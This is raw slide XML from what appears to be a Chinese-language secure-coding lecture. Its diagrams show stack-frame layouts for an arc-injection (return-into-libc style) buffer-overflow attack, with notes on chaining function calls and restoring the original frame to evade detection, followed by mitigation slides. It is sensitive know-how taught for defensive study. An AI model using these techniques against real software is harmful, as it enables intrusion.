      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70664" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="43719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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70665" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="46767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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70666" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="49815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leave/ret address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70667" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="52863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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>g() argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70668" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="5591175"/>
            <a:ext cx="2406650" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70669" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62166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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70670" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="5911850"/>
            <a:ext cx="2406650" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCECFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70671" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="2559050"/>
            <a:ext cx="2406650" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70672" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="32908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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70673" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="4891088"/>
            <a:ext cx="9080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Frame </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70674" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5911850"/>
            <a:ext cx="9715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0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70675" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="70659" idx="3"/>
            <a:endCxn id="70664" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3016250"/>
            <a:ext cx="1588" cy="1508125"/>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70676" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="4357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0677" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5881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0678" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2833688"/>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0679" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6521450"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70680" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="70667" idx="3"/>
            <a:endCxn id="70668" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5438775"/>
            <a:ext cx="1588" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14400005"/>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cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70681" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70682" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="70681" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2247900"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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sp>
        <p:nvSpPr>
          <p:cNvPr id="70683" name="AutoShape 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2819400"/>
            <a:ext cx="3810000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>控制到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>main()</a:t>
            </a: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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10223940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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>为什么这个是有意思的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>攻击者可以多个函数参数链在一起</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码预先写入代码段中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>没有代码被注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>基于内存模式的保护不能阻止弧注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>不需要更大的缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>原帧能够被恢复，以抵抗侦测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106382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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓解措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="1828800"/>
            <a:ext cx="8140700" cy="4675188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓解措施包括：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>预防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>侦测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出并安全地恢复，使得漏洞利用的企图无法得逞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>防范策略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>静态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>分配空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>动态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>分配空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10662894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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>静态方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>静态分配缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
